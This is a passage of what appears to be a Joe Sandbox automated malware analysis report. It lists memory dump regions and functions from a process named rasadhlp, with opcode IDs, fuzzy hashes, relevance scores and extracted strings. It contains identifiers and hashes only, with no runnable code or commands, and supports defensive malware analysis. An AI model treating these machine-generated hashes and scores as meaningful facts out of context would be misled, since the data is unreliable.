                                                                                • Associated: 00000011.00000002.2429424873.0000000000320000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429438848.000000000032D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429443922.000000000032F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_320000_rasadhlp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bd8b41640cbf7c5cc8eface98c62dcaecb75d2e17ce8d347ee4f6c66adda225e
                                                                                • Instruction ID: ef13de0b654f02ff76d2308ab66a77c9553583ac075f1977a40ae0658ec7fa50
                                                                                • Opcode Fuzzy Hash: bd8b41640cbf7c5cc8eface98c62dcaecb75d2e17ce8d347ee4f6c66adda225e
                                                                                • Instruction Fuzzy Hash: 22E0D830710320A6DE379B5CFCC9A3F3266A744781F56880DEB50C7125D7349C50CB52
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00310010, Relevance: 12.6, Strings: 10, Instructions: 98COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2429415643.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_310000_rasadhlp.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Eight$Five$Four$Nine$One$Seven$Six$Ten$Three$Two
                                                                                • API String ID: 0-211638553
                                                                                • Opcode ID: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                                                • Instruction ID: 9c5a9fbf546f129eda169380337c8c4c206647b093047216d9b9db7d4ceccb2e
                                                                                • Opcode Fuzzy Hash: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                                                • Instruction Fuzzy Hash: 76313D38E511289BCB08DB98CD80AED7BB5FF4C340B508027D502737A4DB789986CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003106F0, Relevance: 9.2, APIs: 6, Instructions: 169COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2429415643.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_310000_rasadhlp.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove
                                                                                • String ID:
                                                                                • API String ID: 1951056069-0
                                                                                • Opcode ID: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                                                • Instruction ID: 674ef3ec3f76404bc691bfbf9305989340648e749e97ae6d1a45497da3b80910
                                                                                • Opcode Fuzzy Hash: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                                                • Instruction Fuzzy Hash: 2E51B772A083019BD72EDF26D841BDBB3D8ABDC794F04052DF548E7241E2B5D8D48792
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003108F0, Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2429415643.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_310000_rasadhlp.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove
                                                                                • String ID:
                                                                                • API String ID: 1951056069-0
                                                                                • Opcode ID: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                                                • Instruction ID: 1b912a9163c8a905ed12dfe4471b8fd6003dcd9d9ab8327c598e9f276794cb1e
                                                                                • Opcode Fuzzy Hash: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                                                • Instruction Fuzzy Hash: 32411471A143055BC32DDB29DC45AEBB3D9AFCCB50F09493EF640DA240D2B1D9C887A6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%